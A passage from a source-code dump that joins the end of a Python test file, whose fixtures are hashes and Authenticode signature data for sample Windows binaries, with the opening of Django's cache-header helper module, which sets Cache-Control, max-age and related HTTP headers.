Corporation1!0\x1f\x06\x03U\x04\x03\x13\x18Microsoft Time-Stamp 
PCA\x02\na\x04\xcai\x00\x00\x00\x00\x00\x080\x07\x06\x05+\x0e\x03\x02\x1a\xa0]0\x18\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0b\x06\t*\x86H\x86\xf7\r\x01\x07\x010\x1c\x06\t*\x86H\x86\xf7\r\x01\t\x051\x0f\x17\r090714014555Z0#\x06\t*\x86H\x86\xf7\r\x01\t\x041\x16\x04\x14\x80\xd1\xdb\xd8\r\x9b\x91a\xc3\x9c$\xb5m\xcd\x85"b\xf5u\x1f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x04\x82\x01\x00\x86\xec4$\xf6\x9d\xc4\xe93\xc6e\xa3\x02\x1b4+\x8f1G\xda\xf8\xb1\xd9\xcd[\x0b\xb2T\xef\x1c\x93\xb8g\xb1\x0e?@\xfam@\xa5\xbf\xbf\r"%\xfd\x9a\xa7S\x04\xfbk\x9b\xd3?K\x00\x91\xe2a\x024\xd3\x9b\xa9\x85\x16BE\xfc\x8b~Z\xc1u\xe8L\xb4\x0f\xbe\xe6M\x94\xdc\xaf\xe2\xa9\xe8\x18\x8aF|\xcf\xeaa\xaaU\xc1\xdd\xb4\x8fj\xa6i\xa4\xd13n%(\xbe\x96\xf5\xfds\x88\xe1H%\xc3|.1\xe6\xf7G\x85C\xc8\xa7;E\x0e\xe7\\[\xef=\x0b\x7f\x91\x96\xca\xba\xf2\\&\xa8\xb7\xa9&\xc79\xf7x\xff\xdd\x9d\xf0\xf2C\xec\xe2\xffq_\xe9\xcd\xb3\x85\xb4\x14\xf4\x99\x81\xdf w\x1c\xabM\x02~\xeb\x95\x94,\xe4\xfd!\xc9\xff\xc7\xea\xae\x9f"W\xc5\xbdd\x04\xd0\xe1\xe1\x1f\x8f\x8a\x9e\xbd\x04\xa3\x07o\xcb\xb1\xd6\x97\xd8-L\xf05u\xbc\xe7\xb2\x88\xcb\xa2n\xd0\x11m\xde\x9e+\xf4\xa7\xd3y\xb0\xb6\x8cX\xa6\xa4K\x14j`0\xff\xa0\xff',
)],
'sha1': b'\x9b\xd4D\xd5\x8bY\xcc\xa82\xbb_\xc9\x11\xf8\x1flf\xb4\x0f\xcc',
'name': 'pecoff',
'md5': b'q\x03\x14]B\xe8\x19h\xd1\xa77\x136\x05[-'
}]
SAMPLE_DATA_2 = [{
'sha256':
b"\xa1]\x00\x99\\\xfc\x00'\x0e6\xc4i\x11\x93\xda\x84\xaa\x10\xf8\xcb\xc3\x1b\x9eI\xf3\xe63\x8c\xd2\x7f\x862",
'sha512':
b'^\\\x8d\x97\xb3o=0\xf2\xfe\xc5\x1c\xc8\xf5g|\xb1U#\x9d\x9d%\x82>}A\xe2\x0f\x81\x14\xb48\x15\x88o\x11|SO\xf8)3\x87\xee8\x88\xb6X\xc4\xfa\xb2&q\n\xe0x\xbcW:!A\x11\x05\x05',
'name':
'generic',
'md5':
b'&\x087]\x0b\x15\xf6a\xfbo\xbd\x7fe\xb6\xae)',
'sha1':
b'\xfcY\x7f~\x84\xd2=\x1db\xd5@\xa5\xfd\xac\xc4p\xd8%\xfat'
}]
SAMPLE_DATA_3 = [{
'sha256':
b'\x05\x0b\xbe\xb6\xb9\xaa@Ba\xb2\t\x892\\hC7\x086z\xaa\xedN\x1d\xff=$\xae)\xa5-*',
'sha512':
b"\xf8\xc0`\xcc<.D\xdbL\x04\x0e|\x9c\xfb\x05B\x8a\x17\x92\n'\xc4N%\x8f\xe7]\x11\xe3l\xe6V\xa7\xd0\x18\x86\xe6F\xfe\x8e\x1a\xa7\xb4\x9a\x16Yw\x0c!*\xb4\x91IB5e\x06\x16\r\x1f\xack\x16r",
'name':
'generic',
'md5':
b'{CV{L2\xadz\xde\xd57\xcd;\x13B\xb9',
'sha1':
b'\x83"\xf1\xc2\xc3U\xd8\x842\xf1\xf0:\x1f#\x1fc\x91!\x86\xbd'
}, {
'SignedData': [(
512, 2,
b'0\x82\x153\x06\t*\x86H\x86\xf7\r\x01\x07\x02\xa0\x82\x15$0\x82\x15 \x02\x01\x011\x0e0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x000g\x06\n+\x06\x01\x04\x01\x827\x02\x01\x04\xa0Y0W03\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0f0%\x03\x01\x00\xa0 \xa2\x1e\x80\x1c\x00<\x00<\x00<\x00O\x00b\x00s\x00o\x00l\x00e\x00t\x00e\x00>\x00>\x00>0 0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\x04\x10\xe0(n\x9az\x8d\xf0\xd5\xd9\xea\x88m\xea\x8e\xe6\x00\xa0\x82\x10\xea0\x82\x03z0\x82\x02b\xa0\x03\x02\x01\x02\x02\x108%\xd7\xfa\xf8a\xaf\x9e\xf4\x90\xe7&\xb5\xd6Z\xd50\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA0\x1e\x17\r070615000000Z\x17\r120614235959Z0\\1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1402\x06\x03U\x04\x03\x13+VeriSign Time Stamping Services Signer - G20\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xc4\xb5\xf2R\x15\xbc\x88\x86`)\x16J[/K\x91k\x87\x91\xf35TX5\xea\xd16^bMRQ4q\xc2{f\x1d\x89\xc8\xdd*\xc4j\n\xf67\xd9\x98t\x91\xf6\x92\xae\xb0\xb5v\x96\xf1\xa9JcEG.k\x0b\x92NK+\x8c\xeeXJ\x8b\xd4\x07\xe4\x1a,\xf8\x82\xaaX\xd9\xcdB\xf3-\xc0u\xde\x8d\xab\xc7\x8e\x1d\x9alL\x08\x95\x1e\xde\xdb\xefg\xe1r\xc2I\xc2\x9e`<\xe1\xe2\xbe\x16\xa3cxi\x14{\xad-\x02\x03\x01\x00\x01\xa3\x81\xc40\x81\xc104\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04(0&0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0\x0c\x06\x03U\x1d\x13\x01\x01\xff\x04\x020\x0003\x06\x03U\x1d\x1f\x04,0*0(\xa0&\xa0$\x86"http://crl.verisign.com/tss-ca.crl0\x16\x06\x03U\x1d%\x01\x01\xff\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x06\xc00\x1e\x06\x03U\x1d\x11\x04\x170\x15\xa4\x130\x111\x0f0\r\x06\x03U\x04\x03\x13\x06TSA1-20\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00P\xc5K\xc8$\x80\xdf\xe4\r$\xc2\xde\x1a\xb1\xa1\x02\xa1\xa6\x82-\x0c\x83\x15\x817\n\x82\x0e,\xb0Z\x17a\xb5\xd8\x05\xfe\x88\xdb\xf1\x91\x91\xb3V\x1a@\xa6\xeb\x92\xbe89\xb0u6t:\x98O\xe47\xba\x99\x89\xca\x95B\x1d\xb0\xb9\xc7\xa0\x8dW\xe0\xfa\xd5d\x04B5N\x01\xd13\xa2\x17\xc8M\xaa\'\xc7\xf2\xe1\x86L\x028M\x83x\xc6\xfcS\xe0\xeb\xe0\x06\x87\xdd\xa4\x96\x9e^\x0c\x98\xe2\xa5\xbe\xbf\x82\x85\xc3`\xe1\xdf\xad(\xd8\xc7\xa5Kd\xda\xc7\x1b[\xbd\xac9\x08\xd58"\xa13\x8b/\x8a\x9a\xeb\xbc\x07!?DA\t\x07\xb5e\x1c$\xbcH\xd3D\x80\xeb\xa1\xcf\xc9\x02\xb4\x14\xcfT\xc7\x16\xa3\x80\\\xf9y>]r}\x88\x17\x9e,C\xa2\xcaS\xce}=\xf6*:\xb8O\x94\x00\xa5m\n\x83]\xf9^S\xf4\x18\xb3W\x0fp\xc3\xfb\xf5\xad\x95\xa0\x0e\x17\xde\xc4\x16\x80`\xc9\x0f+n\x86\x04\xf1\xeb\xf4x\'\xd1\x05\xc5\xee4[^\xb9I2\xf230\x82\x03\xc40\x82\x03-\xa0\x03\x02\x01\x02\x02\x10G\xbf\x19\x95\xdf\x8dRFC\xf7\xdbmH\r1\xa40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\x8b1\x0b0\t\x06\x03U\x04\x06\x13\x02ZA1\x150\x13\x06\x03U\x04\x08\x13\x0cWestern Cape1\x140\x12\x06\x03U\x04\x07\x13\x0bDurbanville1\x0f0\r\x06\x03U\x04\n\x13\x06Thawte1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14Thawte Certification1\x1f0\x1d\x06\x03U\x04\x03\x13\x16Thawte Timestamping CA0\x1e\x17\r031204000000Z\x17\r131203235959Z0S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services CA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xa9\xca\xb2\xa4\xcc\xcd 
\xaf\n}\x89\xac\x87u\xf0\xb4N\xf1\xdf\xc1\x0f\xbfga\xbd\xa3d\x1c\xda\xbb\xf9\xca3\xab\x840\x89X~\x8c\xdbk\xdd6\x9e\x0f\xbf\xd1\xecx\xf2w\xa6~o<\xbf\x93\xaf\r\xbah\xf4l\x94\xca\xbdR-\xabH=\xf5\xb6\xd5]_\x1b\x02\x9f\xfa/k\x1e\xa4\xf7\xa3\x9a\xa6\x1a\xc8\x02\xe1\x7fLR\xe3\x0e`\xec@\x1c~\xb9\r\xde?\xc7\xb4\xdf\x87\xbd_zj1.\x03\x99\x81\x13\xa8G \xce1s\rW-\xcdx43\x95\x12\x99\x12\xb9\xdeh/\xaa\xe6\xe3\xc2\x8a\x8c*\xc3\x8b!\x87f\xbd\x83XWou\xbf<\xaa&\x87]\xca\x10\x15<\x9f\x84\xeaT\xc1\nn\xc4\xfe\xc5J\xdd\xb9\x07\x11\x97"|\xdb>\'\xd1\x1ex\xec\x9f1\xc9\xf1\xe6"\x19\xdb\xc4\xb3GC\x9a\x1a_\xa0\x1e\x90\xe4^\xf5\xee|\xf1}\xabb\x01\x8f\xf5M\x0b\xde\xd0"V\xa8\x95\xcd\xae\x88v\xae\xee\xba\r\xf3\xe4M\xd9\xa0\xfbh\xa0\xae\x14;\xb3\x87\xc1\xbb\x02\x03\x01\x00\x01\xa3\x81\xdb0\x81\xd804\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04(0&0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0\x12\x06\x03U\x1d\x13\x01\x01\xff\x04\x080\x06\x01\x01\xff\x02\x01\x000A\x06\x03U\x1d\x1f\x04:0806\xa04\xa02\x860http://crl.verisign.com/ThawteTimestampingCA.crl0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x080\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x01\x060$\x06\x03U\x1d\x11\x04\x1d0\x1b\xa4\x190\x171\x150\x13\x06\x03U\x04\x03\x13\x0cTSA2048-1-530\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x81\x81\x00Jk\xf9\xeaX\xc2D\x1c1\x89y\x99+\x96\xbf\x82\xac\x01\xd6\x1cL\xcd\xb0\x8aXn\xdf\x08)\xa3^\xc8\xca\x93\x13\xe7\x04R\r\xefG\'/\x008\xb0\xe4\xc9\x93N\x9a\xd4"b\x15\xf7?7!Op1\x80\xf1\x8b8\x87\xb3\xe8\xe8\x97\x00\xfe\xcfU\x96N$\xd2\xa9\'Nz\xae\xb7aA\xf3*\xce\xe7\xc9\xd9^\xdd\xbb+\x85>\xb5\x9d\xb5\xd9\xe1W\xff\xbe\xb4\xc5~\xf5\xcf\x0c\x9e\xf0\x97\xfe+\xd3;R\x1b\x1b8\'\xf7?J0\x82\x04\xbf0\x82\x04(\xa0\x03\x02\x01\x02\x02\x10A\x91\xa1Z9x\xdf\xcfIef8\x1dLu\xc20\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000_1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1705\x06\x03U\x04\x0b\x13.Class 3 Public Primary Certification Authority0\x1e\x17\r040716000000Z\x17\r140715235959Z0\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xbe\xbc\xee\xbc~\xef\x83\xeb\xe07O\xfb\x03\x108\xbe\x08\xd2\x8c}\x9d\xfa\x92\x7f\x19\x0c\xc2k\xeeBR\x8c\xde\xd3\x1cH\x13%\xea\xc1cz\xf9Qe\xee\xd3\xaa;\xf5\xf0\x94\x9c+\xfb\xf2f\xd4$\xda\xf7\xf5\x9fn\x1996\xbc\xd0\xa3v\x08\x1e"\'$l8\x91\'\xe2\x84I\xae\x1b\x8a\xa1\xfd%\x82,\x100\xe8q\xab(\xe8wJQ\xf1\xec\xcd\xf8\xf0T\xd4o\xc0\xe3m\n\x8f\xd9\xd8d\x8dc\xb2-N\'\xf6\x85\x0e\xfem\xe3)\x99\xe2\x85G|-\x86\x7f\xe8W\x8f\xadg\xc232\x91\x13 \xfc\xa9#\x14\x9am\xc2\x84Kvh\x04\xd5q,]!\xfa\x88\r&\xfd\x1f-\x91+\xe7\x01UM\xf2m5(\x82\xdf\xd9k\\\xb6\xd6\xd9\xaa\x81\xfd_\xcd\x83\xbac\x9d\xd0"\xfc\xa9;Bi\xb2\x8e:\xb5\xbc\xb4\x9e\x0f^\xc4\xea,\x82\x8b(\xfdS\x08\x96\xdd\xb5\x01 \xd1\xf9\xa5\x18\xe7\xc0\xeeQp7\xe1\xb6\x05HRHo8\xea\xc3\xe8l{D\x84\xbb\x02\x03\x01\x00\x01\xa3\x82\x01\xa00\x82\x01\x9c0\x12\x06\x03U\x1d\x13\x01\x01\xff\x04\x080\x06\x01\x01\xff\x02\x01\x000D\x06\x03U\x1d \x04=0;09\x06\x0b`\x86H\x01\x86\xf8E\x01\x07\x17\x030*0(\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x16\x1chttps://www.verisign.com/rpa01\x06\x03U\x1d\x1f\x04*0(0&\xa0$\xa0"\x86 
http://crl.verisign.com/pca3.crl0\x1d\x06\x03U\x1d%\x04\x160\x14\x06\x08+\x06\x01\x05\x05\x07\x03\x02\x06\x08+\x06\x01\x05\x05\x07\x03\x030\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x01\x060\x11\x06\t`\x86H\x01\x86\xf8B\x01\x01\x04\x04\x03\x02\x00\x010)\x06\x03U\x1d\x11\x04"0 \xa4\x1e0\x1c1\x1a0\x18\x06\x03U\x04\x03\x13\x11Class3CA2048-1-430\x1d\x06\x03U\x1d\x0e\x04\x16\x04\x14\x08\xf5Q\xe8\xfb\xfe==d6|h\xcf[x\xa8\xdf\xb9\xc570\x81\x80\x06\x03U\x1d#\x04y0w\xa1c\xa4a0_1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1705\x06\x03U\x04\x0b\x13.Class 3 Public Primary Certification Authority\x82\x10p\xba\xe4\x1d\x10\xd9)4\xb68\xca{\x03\xcc\xba\xbf0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x81\x81\x00\xae:\x17\xb8J{U\xfadU\xec@\xa4\xedIA\x90\x99\x9c\x89\xbc\xaf.\x1d\xcax#\xf9\x1c\x19\x0f\x7f\xebh\xbc2\xd9\x888\xde\xdc?\xd3\x89\xb4?\xb1\x82\x96\xf1\xa4Z\xba\xed.&\xd3\xde|\x01n\x00\n\x00\xa4\x06\x92\x11H\t@\xf9\x1c\x18yg#$\xe0\xbb\xd5\xe1P\xae\x1b\xf5\x0e\xdd\xe0.\x81\xcd\x80\xa3lRO\x91uU\x8a\xba"\xf2\xd2\xeaAu\x88/cU}\x1eTZ\x95Y\xca\xd94\x81\xc0_^\xf6z\xb50\x82\x04\xdd0\x82\x03\xc5\xa0\x03\x02\x01\x02\x02\x10\t^ \xa8\x0bT\xa4]6\xf6\xc0k\x9b\x02\xf9:0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x000\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA0\x1e\x17\r070627000000Z\x17\r090626235959Z0\x81\xa01\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x130\x11\x06\x03U\x04\x08\x13\nCalifornia1\x120\x10\x06\x03U\x04\x07\x13\tCupertino1\x130\x11\x06\x03U\x04\n\x14\nApple Inc.1>0<\x06\x03U\x04\x0b\x135Digital ID Class 3 - Microsoft Software Validation v21\x130\x11\x06\x03U\x04\x03\x14\nApple Inc.0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xc0\xcc\xa0\x8c\x1b\x94\x94\xe0\xd7c\xcej6M\xa6\\Z7\xd1\x93i\x05\xb1\xf2V\x00\x14\xb0)s4\xb5\x11T\x0c\xe3JI\xf5\xad\x07\xc0\x90\xb7\xc0?GF\xd8\xeb\'\'i\xd7#\x8c\xb8\xb04^"l\xb0\xff\x98^\x0c\x03,J\xa0x&98!\x91\'1\xc0\x9b\xb7\xe6\xfa\x84G\xd0L(%\xd1\x075E\xbb\xa8\xf0\xa60\xdb\xf1\xd6\x8b\xfa\xc8\xa2\x87\xc3f\xfa\x90\xc5W\xccD\x01\xbd\xac\xe2V\xa6\xbaG\xf9E\x9cP\xcf\x02\x03\x01\x00\x01\xa3\x82\x01\x7f0\x82\x01{0\t\x06\x03U\x1d\x13\x04\x020\x000\x0e\x06\x03U\x1d\x0f\x01\x01\xff\x04\x04\x03\x02\x07\x800@\x06\x03U\x1d\x1f\x0490705\xa03\xa01\x86/http://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D\x06\x03U\x1d 
\x04=0;09\x06\x0b`\x86H\x01\x86\xf8E\x01\x07\x17\x030*0(\x06\x08+\x06\x01\x05\x05\x07\x02\x01\x16\x1chttps://www.verisign.com/rpa0\x13\x06\x03U\x1d%\x04\x0c0\n\x06\x08+\x06\x01\x05\x05\x07\x03\x030u\x06\x08+\x06\x01\x05\x05\x07\x01\x01\x04i0g0$\x06\x08+\x06\x01\x05\x05\x070\x01\x86\x18http://ocsp.verisign.com0?\x06\x08+\x06\x01\x05\x05\x070\x02\x863http://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0\x1f\x06\x03U\x1d#\x04\x180\x16\x80\x14\x08\xf5Q\xe8\xfb\xfe==d6|h\xcf[x\xa8\xdf\xb9\xc570\x11\x06\t`\x86H\x01\x86\xf8B\x01\x01\x04\x04\x03\x02\x04\x100\x16\x06\n+\x06\x01\x04\x01\x827\x02\x01\x1b\x04\x080\x06\x01\x01\x00\x01\x01\xff0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x05\x05\x00\x03\x82\x01\x01\x00\x88\xd9Hf\r\xd5\xfa\x0f6\xfd\x87\t\xe2[\xda\x1e\x9c\xb9\xdcs\xbdbM\x1f\x84[\xa1\x88\xf2A\x06\xa1\xe0\xed\x14N\xc4\xa23q>\x9d\x87|\xfc\x0c\xf2\x91\x18\x8d\xb4\x1d\x07x%\xa9\x82\x8aX\xef\xc2?g\x89\xfc\x0f\xaa\x0fMB\xb3o\xbb\xef\x1c\xde\xaf&\xdc\xd6\xad\xf7\xcc\xe7\xce\xbfK<\x02>5\xf7\xef\x14\x8f\xb8\x06"\x95~\xc3,\xa4%\n\xd0\xd8\x01:\x83\x1e\xc1\x87)\xfe]\xc1\rW\xa6G\xde,\xfe*x\x1f\xc6\x99\xa1r\xe8\xd3\xadL\x93\xd6~U\xa8Q\x05\x99\x8aP\x16\xedY]m@\x04\xb9R\xf3\xaa\x8cZme\x96\x0f\x08\xcc\xb8\x15:n#\xbdAz\xb6\xf1K#\x05-\x17<9\n\x8a!@\xe6on&\xab\xed\x91\xcf\x96\xf5\xe8[k\xea\xf2\xde_\x92\n\xce\x1e\xbf\xb5\xb5*\xd5\xac\xdfv\xb9\xc9\xd6\xbe\xca\x15\x8e\xab5;\x98\xea/\x8e\xdc\x084zef\x11V0\xd1\xeb"\x98\x10\x8c\xe34\x93\xda\x10\x90\x18\xf5a8CI\x181\x82\x03\xb20\x82\x03\xae\x02\x01\x010\x81\xc90\x81\xb41\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1\x1f0\x1d\x06\x03U\x04\x0b\x13\x16VeriSign Trust Network1;09\x06\x03U\x04\x0b\x132Terms of use at https://www.verisign.com/rpa (c)041.0,\x06\x03U\x04\x03\x13%VeriSign Class 3 Code Signing 2004 CA\x02\x10\t^ \xa8\x0bT\xa4]6\xf6\xc0k\x9b\x02\xf9:0\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\xa0\x81\xba0\x19\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x040\x1c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0b1\x0e0\x0c\x06\n+\x06\x01\x04\x01\x827\x02\x01\x150\x1f\x06\t*\x86H\x86\xf7\r\x01\t\x041\x12\x04\x10\x85\x90\xd4\xd2\xd3{w\xde\xf3[\xe7E\x88w\xc7+0^\x06\n+\x06\x01\x04\x01\x827\x02\x01\x0c1P0N\xa0,\x80*\x00A\x00p\x00p\x00l\x00e\x00 \x00S\x00o\x00f\x00t\x00w\x00a\x00r\x00e\x00 \x00U\x00p\x00d\x00a\x00t\x00e\xa1\x1e\x80\x1chttp://www.apple.com/macosx 0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x81\x80\x9d\x80\xe8L\xe3P\xae\x81\xbb{\xa5\xe6\x14\xf3\xc6f\x8e\x80\xde\xfa\xceM^\xea\xf7\xad[n\xedFx>;o\x85\x0f\xba:\xd9\xbfA\xf5b\xc02\x96o\xdbBe\xd7\x84f\xbb\xb2\xccJj$\x01\xa0=\xf0\x03f\xdd\x0b\xdb\x8cY\xda\xb3-\x89\xe3\x7f\xfd\x1d\x97\xe3\xab\x15\\b\xc1\xcd\x0f\xdd9\xab\xa4r0\xdd <\x8b=\xf1\xe1\xb8+\xbc<\xf5C\xf7\xf2\xef\x9a5\xcd\xca\xd0\x85R\xca~\xe4F2\xe9KN\x03\n\xcb\xc0\xa1\x82\x01~0\x82\x01z\x06\t*\x86H\x86\xf7\r\x01\t\x061\x82\x01k0\x82\x01g\x02\x01\x010g0S1\x0b0\t\x06\x03U\x04\x06\x13\x02US1\x170\x15\x06\x03U\x04\n\x13\x0eVeriSign, Inc.1+0)\x06\x03U\x04\x03\x13"VeriSign Time Stamping Services 
CA\x02\x108%\xd7\xfa\xf8a\xaf\x9e\xf4\x90\xe7&\xb5\xd6Z\xd50\x0c\x06\x08*\x86H\x86\xf7\r\x02\x05\x05\x00\xa0Y0\x18\x06\t*\x86H\x86\xf7\r\x01\t\x031\x0b\x06\t*\x86H\x86\xf7\r\x01\x07\x010\x1c\x06\t*\x86H\x86\xf7\r\x01\t\x051\x0f\x17\r080725222153Z0\x1f\x06\t*\x86H\x86\xf7\r\x01\t\x041\x12\x04\x10\xcc\xfeN\xc7\xf2\xca\x9e[\xfdH\xa69\xb4m\x03\xb40\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x04\x81\x80\x89\xc0\xf3\xc9\xfc\xe5R]3\xe5\x88E\xf3M}+\xc7\xcc\xe7\x87[\xc6\x99\xb6\xb8\x11\x8a\xf0\xbb:\x9c\x90\xc5\x1c\x0f\xfe\x1d.\xf8D\x87\x887\x12\x8f$%\xd7Lx\x15*\t\xf5\xb7\xa2~\xb0\x8d"y\xa1^\xc5\xd0\x91\xf72\x9cj\xa6\xb7\x809p\xce\xb9\x14\x9b\x87\xa8\xc5C\x14^\x88\xc2\x93Yw\xe9b\x86\x98\x95\x83r\xda\x19*NlIg\x1cX\xf1\xbf"\x83\x9d\xcc\xd2\x1d=\xe8\xb5M\xc2SW\xe7|T\xf4{\xc5\xc9\x00',
)],
'sha1':
b'\x97\x8b\x90\xac\xe9\x9cvHA\xd2\xdd\x17\xd2x\xfa\xc4\x14\x99b\xa3',
'name':
'pecoff',
'md5':
b'\xe0(n\x9az\x8d\xf0\xd5\xd9\xea\x88m\xea\x8e\xe6\x00'
}]
SAMPLE_LIST = {
'pciide.sys': SAMPLE_DATA_1,
'simple': SAMPLE_DATA_2,
'SoftwareUpdate.exe': SAMPLE_DATA_3,
}
# pyformat: enable
if __name__ == '__main__':
absltest.main()
|
mzdaniel/oh-mainline
|
refs/heads/master
|
vendor/packages/Django/django/utils/cache.py
|
55
|
"""
This module contains helper functions for controlling caching. It does so by
managing the "Vary" header of responses. It includes functions to patch the
header of response objects directly and decorators that change functions to do
that header-patching themselves.
For information on the Vary header, see:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.44
Essentially, the "Vary" HTTP header defines which headers a cache should take
into account when building its cache key. Requests with the same path but
different header content for headers named in "Vary" need to get different
cache keys to prevent delivery of wrong content.
An example: i18n middleware would need to distinguish caches by the
"Accept-language" header.
"""
import re
import time
from django.conf import settings
from django.core.cache import get_cache
from django.utils.encoding import smart_str, iri_to_uri
from django.utils.http import http_date
from django.utils.hashcompat import md5_constructor
from django.utils.translation import get_language
from django.http import HttpRequest
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
"""
This function patches the Cache-Control header by adding all
keyword arguments to it. The transformation is as follows:
* All keyword parameter names are turned to lowercase, and underscores
are converted to hyphens.
* If the value of a parameter is True (exactly True, not just a
true value), only the parameter name is added to the header.
* All other parameters are added with their value, after applying
str() to it.
"""
def dictitem(s):
t = s.split('=', 1)
if len(t) > 1:
return (t[0].lower(), t[1])
else:
return (t[0].lower(), True)
def dictvalue(t):
if t[1] is True:
return t[0]
else:
return t[0] + '=' + smart_str(t[1])
if response.has_header('Cache-Control'):
cc = cc_delim_re.split(response['Cache-Control'])
cc = dict([dictitem(el) for el in cc])
else:
cc = {}
# If there's already a max-age header but we're being asked to set a new
# max-age, use the minimum of the two ages. In practice this happens when
# a decorator and a piece of middleware both operate on a given view.
if 'max-age' in cc and 'max_age' in kwargs:
kwargs['max_age'] = min(cc['max-age'], kwargs['max_age'])
# Allow overriding private caching and vice versa
if 'private' in cc and 'public' in kwargs:
del cc['private']
elif 'public' in cc and 'private' in kwargs:
del cc['public']
for (k, v) in kwargs.items():
cc[k.replace('_', '-')] = v
cc = ', '.join([dictvalue(el) for el in cc.items()])
response['Cache-Control'] = cc
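# Illustrative usage sketch (added for clarity; not part of the original
# module). The helper below is hypothetical and is only defined, never called
# at import time. It shows the transformation rules described in the
# patch_cache_control() docstring: underscores become hyphens, a True value
# keeps only the parameter name, and a new max-age is merged with an existing
# one by taking the minimum.
def _example_patch_cache_control():
    from django.http import HttpResponse
    response = HttpResponse()
    response['Cache-Control'] = 'max-age=600, private'
    patch_cache_control(response, max_age=300, no_cache=True)
    # The header now keeps "private", carries the smaller max-age and the bare
    # "no-cache" token, e.g. "max-age=300, private, no-cache" (order may vary).
    return response['Cache-Control']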
def get_max_age(response):
"""
Returns the max-age from the response Cache-Control header as an integer
    (or ``None`` if it wasn't found or wasn't an integer).
"""
if not response.has_header('Cache-Control'):
return
cc = dict([_to_tuple(el) for el in
cc_delim_re.split(response['Cache-Control'])])
if 'max-age' in cc:
try:
return int(cc['max-age'])
except (ValueError, TypeError):
pass
def patch_response_headers(response, cache_timeout=None):
"""
Adds some useful headers to the given HttpResponse object:
ETag, Last-Modified, Expires and Cache-Control
Each header is only added if it isn't already set.
cache_timeout is in seconds. The CACHE_MIDDLEWARE_SECONDS setting is used
by default.
"""
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
if cache_timeout < 0:
cache_timeout = 0 # Can't have max-age negative
if settings.USE_ETAGS and not response.has_header('ETag'):
response['ETag'] = '"%s"' % md5_constructor(response.content).hexdigest()
if not response.has_header('Last-Modified'):
response['Last-Modified'] = http_date()
if not response.has_header('Expires'):
